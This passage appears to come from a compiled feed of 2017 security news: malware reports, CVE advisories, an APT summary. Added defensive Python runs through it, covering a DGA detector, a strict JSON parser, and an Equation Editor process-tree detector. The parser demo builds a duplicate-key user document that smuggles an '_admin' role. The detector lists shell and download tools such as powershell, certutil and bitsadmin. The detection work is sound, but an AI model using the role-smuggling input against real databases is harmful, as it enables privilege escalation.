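def looks_generated(label: str) -> bool:
    """Heuristic verdict; thresholds are illustrative assumptions, tune against your own traffic."""
    f = label_features(label)
    return (
        (f["length"] >= 10 and f["entropy"] >= 3.5)
        or f["vowel_ratio"] < 0.2
        or f["non_vowel_run"] >= 5
    )


def registrable_label(host: str) -> str:
    # Simplification: second label from the right; ignores suffixes such as co.uk.
    parts = host.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def flag_dga_hosts(log_text: str) -> List[str]:
    """Return the distinct hosts in the log whose registrable label looks generated."""
    flagged: List[str] = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue  # skip malformed lines rather than crash on them
        host = fields[2]
        if looks_generated(registrable_label(host)) and host not in flagged:
            flagged.append(host)
    return flagged


if __name__ == "__main__":
    for host in flag_dga_hosts(SAMPLE_LOG):
        print(host, label_features(registrable_label(host)))
```

A heuristic like this is a triage aid, not proof: it should feed a review queue (or be correlated with beaconing intervals and newly registered domains), and the thresholds will need adjusting for CDN and tracking hostnames that legitimately look random.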

“Terdot is a complex malware. Its modular structure, complex injections, and careful use of threads make it resilient, while its spyware and remote execution abilities make it extremely intrusive. Terdot goes above and beyond the capabilities of a banker Trojan. Its focus on harvesting credentials for other services such as social networks and email service providers could turn it into an extremely powerful cyber-espionage tool that is extremely difficult to spot and clean,” Bitdefender concludes.

Critical Vulnerabilities Patched in Apache CouchDB
16.11.2017 securityweek
An update released last week for Apache CouchDB patched critical vulnerabilities that could have been exploited by malicious actors for privilege escalation and code execution on a significant number of installations.

CouchDB is a document-oriented open source database management system and it’s currently the 28th most popular out of the more than 300 systems tracked by DB-Engines. One of the projects using CouchDB is npm, a package manager for JavaScript and the world's largest software registry.

Researcher Max Justicz discovered a CouchDB vulnerability while looking for bugs on the server responsible for distributing npm packages, registry.npmjs.org. The registry serves nearly 3.5 billion package downloads every week, according to the npm website.

The flaw identified by Justicz, tracked as CVE-2017-12635, could have been exploited by an attacker with non-admin privileges to obtain administrator rights and ultimately execute arbitrary code.

“Due to differences in CouchDB’s Erlang-based JSON parser and JavaScript-based JSON parser, it is possible to submit _users documents with duplicate keys for `roles` used for access control within the database, including the special case `_admin` role, that denotes administrative users,” CouchDB developers said in an advisory.
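The advisory describes a parser differential: two JSON parsers disagree on which value a duplicated key carries, so the component doing validation sees different roles from the component doing authorization. The following added example (not CouchDB’s Erlang or JavaScript code) models that disagreement with Python’s `json` module and shows the hardening a defender wants: a strict parser that rejects any duplicate key outright. The sample document is constructed for illustration.

```python
import json
from typing import Any, Callable, List, Tuple


class DuplicateKeyError(ValueError):
    """Raised when a JSON object contains the same key more than once."""


def _last_wins(pairs):
    # Python's default behaviour: a later duplicate silently overwrites an earlier one.
    return dict(pairs)


def _first_wins(pairs):
    # Emulates a parser that keeps the first occurrence and ignores the rest.
    obj = {}
    for key, value in pairs:
        obj.setdefault(key, value)
    return obj


def _reject_duplicates(pairs):
    # Hardened behaviour: a duplicate key is a parse error, at every nesting level.
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise DuplicateKeyError(f"duplicate key {key!r}")
        obj[key] = value
    return obj


def parse_last_wins(text: str) -> Any:
    return json.loads(text, object_pairs_hook=_last_wins)


def parse_first_wins(text: str) -> Any:
    return json.loads(text, object_pairs_hook=_first_wins)


def parse_strict(text: str) -> Any:
    return json.loads(text, object_pairs_hook=_reject_duplicates)


# Constructed sample: a user-style document carrying the "roles" key twice.
SAMPLE_DOC = '{"name": "alice", "roles": [], "roles": ["_admin"], "type": "user"}'


def roles_seen_by(parser: Callable[[str], Any], text: str) -> List[str]:
    """The roles a given parser would hand to an access-control check."""
    return parser(text).get("roles", [])


def check_user_doc(text: str) -> Tuple[bool, str]:
    """Gatekeeper for untrusted documents: returns (accepted, reason)."""
    try:
        doc = parse_strict(text)
    except DuplicateKeyError as exc:
        return (False, str(exc))
    except json.JSONDecodeError as exc:
        return (False, f"malformed JSON: {exc.msg}")
    if not isinstance(doc.get("roles"), list):
        return (False, "roles must be a list")
    return (True, "ok")


if __name__ == "__main__":
    print("last-wins parser sees: ", roles_seen_by(parse_last_wins, SAMPLE_DOC))
    print("first-wins parser sees:", roles_seen_by(parse_first_wins, SAMPLE_DOC))
    print("strict gatekeeper:     ", check_user_doc(SAMPLE_DOC))
```

The two lenient parsers return different role lists for the same bytes, which is exactly the gap the advisory describes; the strict parser removes the ambiguity by refusing the document, and the same single, strict parse should be the one whose result every later check consumes.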

In the case of the npm registry, Justicz believes that exploitation of the vulnerability could have allowed an attacker to modify packages served to users. However, the researcher did not attempt to exploit the vulnerability against npm’s production servers.

While analyzing CVE-2017-12635, a member of the CouchDB security team discovered CVE-2017-12636, a flaw that could have been exploited in combination with the privilege escalation bug to execute arbitrary shell commands on the server.

“CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows a CouchDB admin user to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet,” CouchDB’s advisory explains.

The vulnerabilities were patched last week with the release of versions 2.1.1 and 1.7.0/1.7.1, and CouchDB developers believe all users have already installed the updates. The details of the flaws were made public only a week after the release of the updates to give users time to apply the patches.

APT Trends report Q3 2017
16.11.2017 Kaspersky Analysis  APT
Beginning in the second quarter of 2017, Kaspersky’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports in an effort to make the public aware of what research we have been conducting. This report serves as the next installment, focusing on important reports produced during Q3 of 2017.

As stated last quarter, these reports will serve as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most should be aware of. For brevity’s sake, we are choosing not to publish indicators associated with the reports highlighted. However, if you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: intelreports@kaspersky.com.

Chinese-Speaking Actors
The third quarter demonstrated to us that Chinese-speaking actors have not “disappeared” and are still very much active, conducting espionage against a wide range of countries and industry verticals. In total, 10 of the 24 reports produced centered around activity attributed to multiple actors in this region.

The most interesting of these reports focused on two specific supply chain attacks; Netsarang / ShadowPad and CCleaner. In July 2017, we discovered a previously unknown malware framework (ShadowPad) embedded inside the installation packages hosted on the Netsarang distribution site. Netsarang is a popular server management software used throughout the world. The ShadowPad framework contained a remotely activated backdoor which could be triggered by the threat actor through a specific value in a DNS TXT record. Others in the research community have loosely attributed this attack to the threat actor Microsoft refers to as BARIUM. Following up on this supply chain attack, another was reported initially by Cisco Talos in September involving CCleaner, a popular cleaner / optimization tool for PCs. The actors responsible signed the malicious installation packages with a legitimate Piriform code signing certificate and pushed the malware between August and September.

Q3 also showed China is very interested in policies and negotiations involving Russia with other countries. We reported on two separate campaigns demonstrating this interest. To date, we have observed three separate incidents where Russia and another country hold talks and are targeted shortly thereafter, IndigoZebra being the first. IronHusky was a campaign we first discovered in July targeting Russian and Mongolian government, aviation companies, and research institutes. Earlier in April, both conducted talks related to modernizing the Mongolian air defenses with Russia’s help. Shortly after these talks, the two countries were targeted with a Poison Ivy variant from a Chinese-speaking threat actor. In June, India and Russia signed a much-awaited agreement to expand a nuclear power plant in India, as well as further define the defense cooperation between the two countries. Very soon after, both countries’ energy sectors were targeted with a new piece of malware we refer to as “H2ODecomposition”. In some cases this malware was masquerading as a popular Indian antivirus solution (QuickHeal). The name of the malware was derived from an initial RC5 string used in the encryption process (2H2O=2H2+O2) which describes a chemical reaction used in hydrogen fuel cells.

Other reports published in the third quarter under Chinese-speaking actors were mainly updates to TTPs by known adversaries such as Spring Dragon, Ocean Lotus, Blue Termite, and Bald Knight. The Spring Dragon report summarized the evolution of their malware to date. Ocean Lotus was observed conducting watering hole attacks on the ASEAN website (as done previously) but with a new toolkit. A new testing version of Emdivi was discovered in use by Blue Termite, as well as their testing of CVE-2017-0199. Finally, Bald Knight (aka Tick) was seen using their popular XXMM malware family to target Japan and South Korea.

Below is a summary of report titles produced for the Chinese region. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to intelreports@kaspersky.com.

Analysis and evolution of Spring Dragon tools
EnergyMobster – Campaign targeting Russian-Indian energy project
IronHusky – Intelligence of Russian-Mongolian military negotiations
The Bald Knight Rises
Massive watering holes campaign targeting Asia-Pacific
Massive Watering Holes Campaign Targeting AsiaPacific – The Toolset
NetSarang software backdoored in supply chain attack – early warning
ShadowPad – popular server management software hit in supply chain attack
New BlueTermite samples and potential new wave of attacks
CCleaner backdoored – more supply chain attacks
Russian-Speaking Actors
The third quarter was a bit slower with respect to Russian speaking threat actors. We produced four total reports, two of which focused on ATM malware, one on financial targeting in Ukraine and Russia, and finally a sort of wrap-up of Sofacy activity over the summer.

The ATM related reports centered around Russian speaking actors using two previously unknown pieces of malware designed specifically for certain models. “Cutlet Maker” and “ATMProxy” both ultimately allowed the users to dispense cash at will from a chosen cartridge within the ATMs. ATMProxy was interesting since it would sit dormant on an ATM until a card with a specific hard coded number was inserted, at which point it would dispense more cash than what was requested.

Another report discussed a new technique utilizing highly targeted watering holes to target financial entities in Ukraine and Russia with Buhtrap. Buhtrap has been around since at least 2014, but this new wave of attacks was leveraging search engine optimization (SEO) to float malicious watering hole sites to the top of search results, thus providing more of a chance for valid targets to visit the malicious sites.

Finally, we produced a summary report on Sofacy’s summertime activity. Nothing here was groundbreaking, but rather showed the group remained active with their payloads of choice; SPLM, GAMEFISH, and XTUNNEL. Targeting also remained the same, focusing on European defense entities, Turkey, and former republics.

Below is a list of report titles for reference:

ATMProxy – A new way to rob ATMs
Cutlet maker – Newly identified ATM malware families sold on Darknet
Summertime Sofacy – July 2017
Buhtrap – New wave of attacks on financial targets
English-Speaking Actors
The last quarter also had us reporting on yet another member of the Lamberts family. Red Lambert was discovered during our previous analysis of Grey Lambert and utilized hard coded SSL certificates in its command and control communications. What was most interesting about the Red Lambert is that we discovered a possible operational security (OPSEC) failure on the actor’s part, leading us to a specific company who may have been responsible, in whole or in part, for the development of this Lambert malware.

The Red Lambert
Korean-Speaking Actors
We were also able to produce two reports on Korean speaking actors, specifically involving Scarcruft and Bluenoroff. Scarcruft was seen targeting high profile, political entities in South Korea using both destructive malware as well as malware designed more for espionage. Bluenoroff, the financially motivated arm of Lazarus, targeted a Costa Rican casino using Manuscrypt. Interestingly enough, this casino was compromised by Bluenoroff six months prior as well, indicating they potentially lost access and were attempting to get back in.

Report titles focusing on Korean-speaking actors:

Scent of ScarCruft
Bluenoroff hit Casino with Manuscrypt
Other Activity
Finally, we also wrote seven other reports on “uncategorized” actors in the third quarter. Without going into detail on each of these reports, we will focus on two. The first being a report on the Shadowbrokers’ June 2017 malware dump. An anonymous “customer” who paid to get access to the dump of files posted the hashes of the files for the month, mainly due to their displeasure in what was provided for the money. We were only able to verify one of nine file hashes, which ended up being an already known version of Triple Fantasy.

The other report we’d like to highlight (“Pisco Gone Sour”) is one involving an unknown actor targeting Chilean critical institutions with Veil, Meterpreter, and PowerShell Empire. We are constantly searching for new adversaries in our daily routine and this appears to be just that. The use of publicly available tools makes it difficult to attribute this activity to a specific group, but our current assessment based on targeting is that the actor may be based somewhere in South America.

Dark Cyrene – politically motivated campaign in the Middle East
Pisco Gone Sour – Cyber Espionage Campaign Targeting Chile
Crystal Finance Millennium website used to launch a new wave of attacks in Ukraine
New Machete activity – August 2017
Shadowbroker June 2017 Pack
The Silence – new trojan attacking financial organizations
Final Thoughts
Normally we would end this report with some predictions for the next quarter, but as it will be the end of the year soon, we will be doing a separate predictions report for 2018. Instead, we would like to point out one alarming trend we’ve observed over the last two quarters, which is an increase in supply chain attacks. Since Q2, there have been at least five incidents where actors have targeted the supply chain to accomplish their goals instead of going directly after the end target: MeDoc, Netsarang, CCleaner, Crystal Finance, and Elmedia. While these incidents were not the result of just one group, it does show how the attention of many of the actors out there may be shifting in a direction that could be much more dangerous. Successfully compromising the supply chain provides easy access to a much wider target base than available through traditional means such as spear phishing. As an added benefit, these attacks can remain undetected for months, if not longer. It remains to be seen if this trend will continue into 2018, but given the successes from the five mentioned above, we feel we haven’t seen the last of this type of attack in the near future.

WordPress Sites Exposed to Attacks by 'Formidable Forms' Flaws
16.11.2017 securityweek
Vulnerabilities found by a researcher in a popular WordPress plugin can be exploited by malicious actors to gain access to sensitive data and take control of affected websites.

Formidable Forms, available both for free and as a paid version that provides additional features, is a plugin that allows users to easily create contact pages, polls and surveys, and other types of forms. The plugin has more than 200,000 active installations.

Jouko Pynnönen of Finland-based company Klikki Oy has analyzed the plugin and discovered several vulnerabilities, including ones that introduce serious security risks for the websites using it.

The flaw with the highest severity is a blind SQL injection that can allow attackers to enumerate a website’s databases and obtain their content. Exposed data includes WordPress user credentials and data submitted to a website via Formidable forms.

The researcher also found another flaw that exposes data submitted via Formidable forms. Both this and the SQL injection bug are related to Formidable’s implementation of shortcodes, WordPress-specific code that allows users to add various types of content to their sites with very little effort.

Pynnönen also discovered reflected and stored cross-site scripting (XSS) vulnerabilities. The stored XSS allows an attacker to execute arbitrary JavaScript code in the context of an administrator’s browsing session – the attacker injects the malicious code via forms and it gets executed when viewed by the site admin in the WordPress dashboard.

The expert also noticed that if the iThemes Sync WordPress maintenance plugin is present alongside Formidable Forms, an attacker can exploit the aforementioned SQL injection flaw to obtain a user’s ID and authentication key. This information can be used to control WordPress via iThemes Sync, including to add new admins or install plugins.

Formidable Forms addressed the vulnerabilities with the release of versions 2.05.02 and 2.05.03. iThemes Sync does not view the attack vector described by the researcher as a vulnerability so it has decided not to release a patch.

Pynnönen identified these flaws after being invited to take part in a HackerOne-hosted bug bounty program that offers rewards of up to $10,000. The program was run by an unnamed Singapore-based tech company, but the Formidable Forms vulnerabilities qualified for a bounty due to the fact that the plugin had been used by the firm. Exploitation of the flaws on the tech firm’s website could have allowed an attacker to gain access to personal information and other sensitive data.

The researcher earned $4,500 for the SQL injection vulnerability and a few hundred dollars for each of the other security holes. However, he is displeased that the Singaporean company downplayed the risks posed by the flaws and downgraded the severity of the SQL injection bug from “critical” to “high.”

Pynnönen previously identified serious vulnerabilities in Yahoo Mail, WordPress plugins and the WordPress core.

Oracle Patches Critical Flaws in Jolt Server for Tuxedo
16.11.2017 securityweek
Oracle informed customers on Tuesday that it has patched several vulnerabilities, including ones rated critical and high severity, in the Jolt Server component of Oracle Tuxedo.

Oracle Tuxedo, a key component of Oracle Fusion Middleware, is an application server that helps users build and deploy enterprise applications developed in non-Java programming languages. Jolt provides a Java-based interface that extends the functionality of Tuxedo applications so that they can be accessed over the Internet or intranet using a web browser.

According to Oracle, a total of five vulnerabilities have been found in the Jolt Server component – the Jolt client is not impacted. The security holes affect Tuxedo versions 11.1.1, 12.1.1, 12.1.3 and 12.2.2.

The most serious of the flaws, with a CVSS score of 10, is CVE-2017-10269, which allows an unauthenticated attacker with access to the network to easily take control of Tuxedo.

“Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Tuxedo accessible data as well as unauthorized access to critical data or complete access to all Oracle Tuxedo accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Tuxedo,” Oracle said.

Another critical vulnerability in Jolt Server is CVE-2017-10272. The flaw has a CVSS score of 9.9 and its impact is similar to the one of CVE-2017-10269. However, in order to exploit it, an attacker needs to have access to at least a low privileged account.

The company pointed out that these vulnerabilities may have significant impact on other products as well, not just Tuxedo. For example, Oracle PeopleSoft products also use Tuxedo, which means PeopleSoft customers are required to apply the patches as well.

The updates released by Oracle also resolve a high severity vulnerability that allows an unauthenticated attacker to gain access to critical data (CVE-2017-10267). Another high severity flaw, tracked as CVE-2017-10278, allows access to critical data as well, but it can also be exploited to modify data and cause a partial DoS condition in Tuxedo. On the other hand, the vendor said CVE-2017-10278 is difficult to exploit.

The last vulnerability, CVE-2017-10266, has been classified as medium severity as it only gives access to a subset of Tuxedo data.

“Oracle strongly recommends affected Oracle Customers apply this Security Alert as soon as possible,” said Eric Maurice, director of security assurance at Oracle.

This is the second round of security patches released by Oracle since the company’s October Critical Patch Update (CPU). In late October, the company informed customers of an out-of-band update that fixed a critical vulnerability in Identity Manager, which is also part of the Fusion Middleware offering.

Investment Firm Combines Smarsh and Actiance to Solve FinServ Compliance Issues
16.11.2017 securityweek Safety
Two major financial services and regulated industry compliance firms, Smarsh and Actiance, have combined to better serve industry's increasingly complex requirements around communications, archiving and discovery regulations. Actiance has been acquired by K1 Investment Management, and combined with Smarsh.

"The Financial Services sector is undergoing rapid change," explains Neil Malik, Managing Partner at K1; "legacy technologies are no longer sufficient to comply with SEC and FINRA standards, let alone MiFID II. This combination of capabilities from Actiance and Smarsh provides the industry with a means to get ahead -- and stay ahead -- of compliance trends, while introducing the latest communications technologies to increase efficiency and effectiveness in the modern enterprise."

Smarsh provides cloud-based archiving and compliance solutions for companies in regulated and litigious industries. It provides a unified compliance and e-discovery workflow across a range of digital communications systems, including emails, public and enterprise social media, websites, and instant and mobile messaging. Actiance is a major provider of communications compliance, archiving, and analytics -- providing compliance across a broad set of communications channels with insights on what's being captured.

Before the acquisition, the two firms could be considered competitors, and there is overlap in their solutions. Together, however, they provide a more complete compliance service from a single provider. "Together, Actiance and Smarsh uniquely enable global customers across industries to capture, record, store, and analyze over 100 content types," said Kailash Ambwani, CEO of Actiance. "Together we will enhance our combined sales and distribution capabilities, offer our customers additional resources and services, and accelerate our product development."

"Perhaps most importantly," added Stephen Marsh, founder, chairman and CEO of Smarsh, "organizations with legacy, on-premise capture and archiving solutions can make the overdue transition to upgraded and more modern solutions. All of this is now possible through a single provider."

Compliance is an increasingly important part of the risk management portfolio. New regulations are affecting all industries, but none more so than financial services. Coupled with the growth of regulations is an increasingly active regulator. The annual Eversheds Sutherland analysis of Financial Industry Regulatory Authority (FINRA) cases shows that FINRA fines on FinServ firms increased by around 435% in 2016.

Two particular areas of FINRA activity are relevant to the newly combined suppliers: 'books and records' actions, and actions against compliance officers. Books and records fines increased by 423%, "driven largely by enforcement actions against 12 firms for, among other things, failing to preserve records in "write once, read many" (WORM) format. FINRA fined these firms a total of $14.4 million."

FINRA also cracked down on individual compliance officers. In one case, a firm's former compliance officer was fined $25,000 and suspended for three months. Eversheds Sutherland (US) partner Brian Rubin commented, "These cases are a signal to compliance officers that they are in FINRA's crosshairs. They ought to take heed and try to ensure that adequate compliance-related policies and procedures are in place."

Few details of the new Smarsh/Actiance arrangement have been made public. It is not described as a merger, and there is no current indication of a new name for the combined firms. The statement merely says, "Together, the combined company offers deployment options (cloud, dedicated, on-premise, and hybrid) to meet the needs of its customers... It will continue to support both company's product lines while providing customers greater value and flexibility. Near-term priorities include more investment in product capabilities, increased flexibility in deployment options, accelerated expansion in Europe and development of a joint channel partner program."

Existing operations of both Smarsh and Actiance will be maintained in Oregon, California, New York, Massachusetts, Georgia, North Carolina, Canada, India, and the United Kingdom. Terms of the deal were not disclosed.

In September, K1 Investment Management acquired SecureAuth for $225 million, with plans to merge it with Core Security, a firm focused on vulnerability discovery, identity governance, and threat management. K1 had previously acquired Damballa in a deal reported to be under $10 million.

Multi-Stage Android Malware Evades Google Play Detection
16.11.2017 securityweek Android
A newly discovered multi-stage Android malware that managed to sneak into Google Play is using advanced anti-detection features, ESET security researchers reveal.

Eight malicious applications hiding the new threat were found in the official application store, all legitimate-looking but delaying the malicious activity to hide their true intent. Google has removed all eight programs after being alerted of the threat.

Detected as Android/TrojanDropper.Agent.BKY, the applications form a new family of multi-stage Android malware, ESET says. Although the most popular of these apps reached only several hundred downloads, the use of advanced anti-detection features makes this malware family interesting.

All samples of the mobile Trojan employ a multi-stage architecture and make use of encryption to stay under the radar, the security researchers say. The applications managed to keep their malicious intent hidden by not requesting suspicious permissions after installation and by mimicking the activity they were supposed to exhibit.

However, the apps also decrypt and execute a first-stage payload designed to decrypt and execute the second-stage payload from the assets of the app downloaded from Google Play. These steps, however, are not visible to the user but serve as obfuscatory measures, ESET says.

The second-stage payload downloads a malicious app from a hardcoded URL without the victim’s knowledge. After a delay of around 5 minutes, however, the victim is prompted to install this third-stage payload.

This application masquerades as Adobe Flash Player or another popular app. To appear legitimate to the user, the app uses a name such as Android Update or Adobe Update to trick the user into allowing it to execute and into granting the necessary permissions for the payload to perform nefarious actions.

Once installed and with the requested permissions granted, the app decrypts and executes a final, fourth-stage payload. According to ESET, this payload was a mobile banking Trojan in all analyzed cases.

The Trojan was designed to present the victim with fake login forms to steal their credentials or credit card details.

Because one of the malicious apps downloads the final payload using the bit.ly URL shortener, the security researchers discovered that the link had been used almost 3000 times as of November 14, and that most of the hits came from the Netherlands.

Two of the most recent samples of this malware downloader were observed dropping either the notorious MazarBot banking Trojan or spyware. According to ESET, the downloader’s nature allows its operators to deliver any payload through it, “as long as it doesn’t get flagged by the Google Protect mechanism.”

Impacted users are advised to first deactivate the admin rights for the installed payload, and then uninstall the surreptitiously-installed apps, along with the application initially downloaded from the Play Store.

Users should head to Settings > (General) > Security > Device administrators and deactivate the admin rights that Adobe Flash Player, Adobe Update, or Android Update might have. The installed payload can be removed from the Application manager.

The nefarious apps involved in this malicious campaign include MEX Tools, Clear Android, Cleaner for Android, World News, WORLD NEWS, World News PRO, Игровые Автоматы Слоты Онлайн, and Слоты Онлайн Клуб Игровые Автоматы.

“Unfortunately, multi-stage downloaders, with their improved obfuscation features, have a better chance of sneaking into official app stores than common Android malware does. Users who want to stay protected should not rely fully on the stores’ protections; instead, it’s crucial for users to check app ratings and comments, pay attention to what permissions they grant to apps, and run a quality security solution on their mobile devices,” ESET concludes.

UK Cyber Security Chief Blames Russia for Hacker Attacks
16.11.2017 securityweek BigBrothers
Russia has launched cyber attacks on the UK media, telecoms and energy sectors in the past year, Britain's cyber security chief said Wednesday amid reports of Russian interference in the Brexit referendum.

"Russia is seeking to undermine the international system. That much is clear," Ciaran Martin, head of Britain's National Cyber Security Centre (NCSC) said at a London tech conference, according to his office.

"Russian interference, seen by the NCSC over the past year, has included attacks on the UK media, telecommunications and energy sectors," Martin said.

The centre has coordinated the government's response to 590 significant incidents since its launch in 2016, although the government agency has not detailed which were linked to Russia.

Prime Minister Theresa May on Monday accused Moscow of "seeking to weaponise information" and "sow discord in the West and undermine our institutions".

Russia's cyber activities include "deploying its state-run media organisations to plant fake stories and photo-shopped images", she said in a speech.

The scathing criticism was rejected by Russia's foreign ministry, which accused May of trying to distract the British public from problems at home.

Moscow's alleged attempts to influence last year's referendum on Britain's membership of the European Union are part of investigations under way in London.

May told lawmakers on Wednesday that parliament's intelligence and security committee would be looking into Russian interference.

Meanwhile parliament's digital, culture, media and sport committee has requested data from Twitter and Facebook on Russia-linked accounts and aims to interview social media executives at the British embassy in Washington early next year.

- Pro-Brexit 'bots' -

Damian Collins, the committee chairman, said it was "beyond doubt" that Russia has interfered in UK politics.

He said there was a pattern of behaviour of Russian organisations seeking out opportunities to create division, unrest and instability in the West.

"Foreign organisations have the ability to manipulate social media platforms to target voters abroad," he told AFP.

"This is seriously-organised buildings of hundreds of people engaged in propagating every day fake news through social media."

He said it was "terrifying" how cheap and easy it was for them to reach millions of people.

"It is one of the biggest threats our democracies face and we have to be serious about combatting it," Collins added.

May's spokesman insisted: "There has been no evidence of successful interference in our electoral processes."

Researchers at the University of Edinburgh, who examined 2,752 accounts suspended by Twitter in the United States, found 419 were operating from the Russian Internet Research Agency and attempting to influence British politics, The Guardian reported.

Professor Laura Cram, the university's neuropolitics research director, told the newspaper they tweeted about Brexit 3,468 times -- mostly after the June 23 referendum.

The content overall was "quite chaotic and it seems to be aimed at wider disruption. There's not an absolutely clear thrust. We pick up a lot on refugees and immigration", she said.

Meanwhile researchers at Swansea University in Wales and the University of California, Berkeley, have found more than 150,000 Russian-based Twitter accounts which may have influenced the Brexit referendum.

The social media accounts switched their attention to EU membership in the run-up to the 2016 referendum, according to research outlined in The Times newspaper.

Many of the accounts were fully-automated "bot" profiles which posted hundreds of tweets daily, or "cyborg" accounts which were partially run by people, the newspaper said.

The majority of the posts were pro-Brexit, while some supported remaining in the European Union.

Meanwhile it was revealed that a tweet which caused a furore after the Westminster terror attack in March originally came from a trolling agency account which, according to evidence before the US Congress, is backed by the Russian government.

The tweet showed a picture of a woman in a headscarf walking next to a victim, with the words: "Muslim woman pays no mind to the terror attack, casually walks by a dying man while checking phone".

Amazon Echo, Google Home Vulnerable to BlueBorne Attacks
16.11.2017 securityweek
Amazon Echo and Google Home devices are vulnerable to attacks exploiting a series of recently disclosed Bluetooth flaws dubbed “BlueBorne.”

IoT security firm Armis reported in September that billions of Android, iOS, Windows and Linux devices using Bluetooth had been exposed to a new attack that can be carried out remotely without any user interaction.

A total of eight Bluetooth implementation vulnerabilities allow a hacker who is in range of the targeted device to execute arbitrary code, obtain sensitive information, and launch man-in-the-middle (MitM) attacks. There is no need for the victim to click on a link or open a file in order to trigger the exploit, and most security products would likely not detect an attack.

Google patched the vulnerabilities affecting Android in September and Microsoft released fixes for Windows in July. Apple had already addressed the issue in iOS one year prior to disclosure, and Linux distributions released updates shortly after disclosure.

However, Armis has now revealed that the voice-activated personal assistants Google Home and Amazon Echo are also vulnerable to attacks leveraging the BlueBorne flaws.

Echo is affected by a remote code execution vulnerability in the Linux kernel (CVE-2017-1000251) and an information disclosure bug in the SDP server (CVE-2017-1000250). Google Home is exposed to attacks by an information leakage issue affecting Android’s Bluetooth implementation (CVE-2017-0785). This Android flaw can also be exploited to cause a denial-of-service (DoS) condition.

Since the Bluetooth feature cannot be disabled on either of the devices, attackers can easily launch an attack as long as they are in range. Armis has published a video showing how an Amazon Echo device can be hacked and manipulated by a remote attacker:

The security firm pointed out that this is the first remote attack demonstrated against Echo. An attack method was previously described by MWR, but it required physical access to the device.

Amazon Echo and Google Home represent 99 percent of the U.S. market for voice-controlled personal assistants, with 15 million and 5 million units sold, respectively. This normally indicates a significant number of potential victims, including many enterprises that use these products. However, Armis has notified Google and Amazon of the vulnerabilities and both companies released patches that have likely reached a majority of devices via automatic updates.

“The Amazon Echo and Google Home are the better examples as they were patched, and did not need user interaction to update. However, the vast bulk of IoT devices cannot be updated,” Armis researchers said. “However, even the Echos and the Homes will eventually be replaced by new hardware versions (as Amazon and Google recently announced), and eventually the old generations will not receive updates - potentially leaving them susceptible to attacks indefinitely.”

Armis has released an Android app that is designed to help users identify vulnerable devices.

Microsoft Patches 17 Year-Old Vulnerability in Office
16.11.2017 securityweek
Microsoft on Tuesday released its November 2017 security updates to resolve 53 vulnerabilities across products, including a security bug that has impacted all versions of its Microsoft Office suite over the past 17 years.

Tracked as CVE-2017-11882, the vulnerability resides in the Microsoft Equation Editor (EQNEDT32.EXE), a tool that provides users with the ability to insert and edit mathematical equations inside Office documents.

The bug was discovered by Embedi security researchers as part of very old code in Microsoft Office. The vulnerable version of EQNEDT32.EXE was compiled on November 9, 2000, “without essential protective measures,” the researchers say.

Although the component was replaced in Office 2007 with new methods of displaying and editing equations, Microsoft kept the vulnerable file up and running in the suite, most likely to ensure compatibility with older documents.

“The component is an OutProc COM server executed in a separate address space. This means that security mechanisms and policies of the Office processes do not affect exploitation of the vulnerability in any way, which provides an attacker with a wide array of possibilities,” Embedi notes in a research paper (PDF).

EQNEDT32.EXE, the researchers explain, employs a set of standard COM interfaces for Object Linking and Embedding (OLE), an Office feature already known to be abused by cybercriminals.

The researchers discovered they could cause a buffer overflow using a procedure calling a function designed to “copy null-term lines from an internal form to buffer which was sent to it as the first argument.” The bug, the researchers say, can be exploited to achieve arbitrary code execution.

According to Embedi, the use of several OLEs designed to exploit the vulnerability could lead to the execution of an arbitrary sequence of commands, such as downloading a file from the Internet and executing it.
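Because EQNEDT32.EXE runs as its own out-of-process COM server, an exploit that makes it run commands shows up in process-creation telemetry as the Equation Editor acquiring a child process. The following is an added example of that process-tree heuristic (written here, not taken from the article or Embedi's paper); the Sysmon-style events, paths and the list of shell/download tools are constructed assumptions.

```python
# Added example (not from the article or Embedi's paper): a process-tree
# heuristic for Equation Editor abuse. Because EQNEDT32.EXE runs as its own
# out-of-process COM server, an exploit that makes it run commands shows up in
# process-creation telemetry as EQNEDT32.EXE acquiring a child process.
# The events below are constructed Sysmon-style records, not real telemetry.
from dataclasses import dataclass
from typing import Iterable, List

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
EQUATION_EDITOR = "eqnedt32.exe"
# Interpreters and download-capable tools: any child of the Equation Editor is
# suspicious, these just raise the severity (assumed list, adjust per estate).
SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
          "cscript.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon event ID 1 style)."""
    pid: int
    image: str
    parent_pid: int
    parent_image: str
    command_line: str


@dataclass(frozen=True)
class Alert:
    severity: str   # "low", "medium" or "high"
    pid: int
    reason: str


def basename(image: str) -> str:
    """Case-insensitive file name of a Windows image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_eqnedt_abuse(events: Iterable[ProcEvent]) -> List[Alert]:
    alerts: List[Alert] = []
    for ev in events:
        child, parent = basename(ev.image), basename(ev.parent_image)
        if parent == EQUATION_EDITOR:
            # The Equation Editor has no legitimate reason to start processes.
            severity = "high" if child in SHELLS else "medium"
            alerts.append(Alert(severity, ev.pid,
                                f"{child} spawned by EQNEDT32.EXE: {ev.command_line}"))
        elif child == EQUATION_EDITOR:
            if parent in OFFICE_HOSTS:
                # Expected when a document embeds an equation object; keep as
                # low-severity context so analysts can tie the chain together.
                alerts.append(Alert("low", ev.pid, f"Equation Editor started by {parent}"))
            else:
                alerts.append(Alert("medium", ev.pid,
                                    f"Equation Editor started by non-Office parent {parent}"))
    return alerts


WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
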